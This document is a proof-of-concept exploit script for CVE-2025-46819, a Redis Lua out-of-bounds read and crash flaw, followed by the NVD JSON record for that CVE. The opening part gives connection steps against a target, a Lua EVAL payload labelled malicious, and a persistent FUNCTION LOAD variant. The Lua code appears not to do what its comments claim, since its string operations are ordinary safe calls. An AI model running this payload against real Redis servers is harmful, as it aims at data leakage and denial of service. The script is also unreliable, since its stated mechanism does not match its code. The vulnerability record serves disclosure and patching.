CVE-2025-46819

-- CVE-2025-46819 Redis Lua Script Out-of-Bounds Read / DoS PoC -- This PoC demonstrates the vulnerability by crafting a malicious Lua script -- that triggers out-of-bounds memory access in Redis's Lua scripting engine. -- Requirements: Valid Redis credentials with EVAL/FUNCTION permissions. -- Step 1: Connect to Redis with authentication -- redis-cli -h <target_host> -p 6379 -a <password> -- Step 2: Execute the malicious Lua script via EVAL command -- The script attempts to trigger out-of-bounds memory read by manipulating -- string buffer operations within the Lua scripting context. EVAL " -- Attempt to trigger OOB read via crafted string operations local malicious_str = string.rep('A', 8192) local result = '' -- Exploit boundary condition in Lua string handling for i = 1, #malicious_str do -- Manipulate internal buffer pointers to cause out-of-bounds access local byte_val = string.byte(malicious_str, i) result = result .. string.char(byte_val) end -- Force memory access beyond allocated buffer local oob_data = string.sub(malicious_str, 1, 99999999) return #oob_data " 0 -- Alternative: Use FUNCTION LOAD for persistent malicious script -- FUNCTION LOAD "#!lua name=malign\nredis.call('EVAL', 'malicious_payload', 0)" -- Impact: -- 1. If successful, returns data from out-of-bounds memory regions -- 2. May cause Redis server to crash (SIGSEGV), resulting in DoS -- 3. Could leak sensitive data from other Redis keys or system memory

{"cve": {"id": "CVE-2025-46819", "sourceIdentifier": "[email protected]", "published": "2025-10-03T19:15:43.490", "lastModified": "2026-01-27T19:37:47.583", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Redis is an open source, in-memory database that persists on disk. Versions 8.2.1 and below allow an authenticated user to use a specially crafted LUA script to read out-of-bound data or crash the server and subsequent denial of service. The problem exists in all versions of Redis with Lua scripting. This issue is fixed in version 8.2.2. To workaround this issue without patching the redis-server executable is to prevent users from executing Lua scripts. This can be done using ACL to block a script by restricting both the EVAL and FUNCTION command families."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.2.20", "matchCriteriaId": "C2F4D4F6-6F7C-46BC-B37C-DFAC34B097AC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0", "versionEndExcluding": "7.2.11", "matchCriteriaId": "4F82BD2A-473F-4F3F-9C80-C6448D07C45D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.6", "matchCriteriaId": "F6E336B8-E000-4EFA-95F8-F2B74A4913F0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.4", "matchCriteriaId": "459EBC07-D37A-44E5-95DB-4C3FD9F008FF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.2.0", "versionEndExcluding": "8.2.2", "matchCriteriaId": "CBF13EC1-FE0A-4242-B8D3-2681485DDDF2"}]}]}], "references": [{"url": "https://github.com/redis/redis/commit/3a1624da2449ac3dbfc4bdaed43adf77a0b7bfba", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/redis/redis/releases/tag/8.2.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/redis/redis/security/advisories/GHSA-4c68-q8q8-3g4f", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.vicarius.io/vsociety/posts/cve-2025-46819-detect-redis-vulnerability", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Third Party Advisory"]}, {"url": "https://www.vicarius.io/vsociety/posts/cve-2025-46819-mitigate-redis-vulnerability", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mitigation", "Third Party Advisory"]}]}}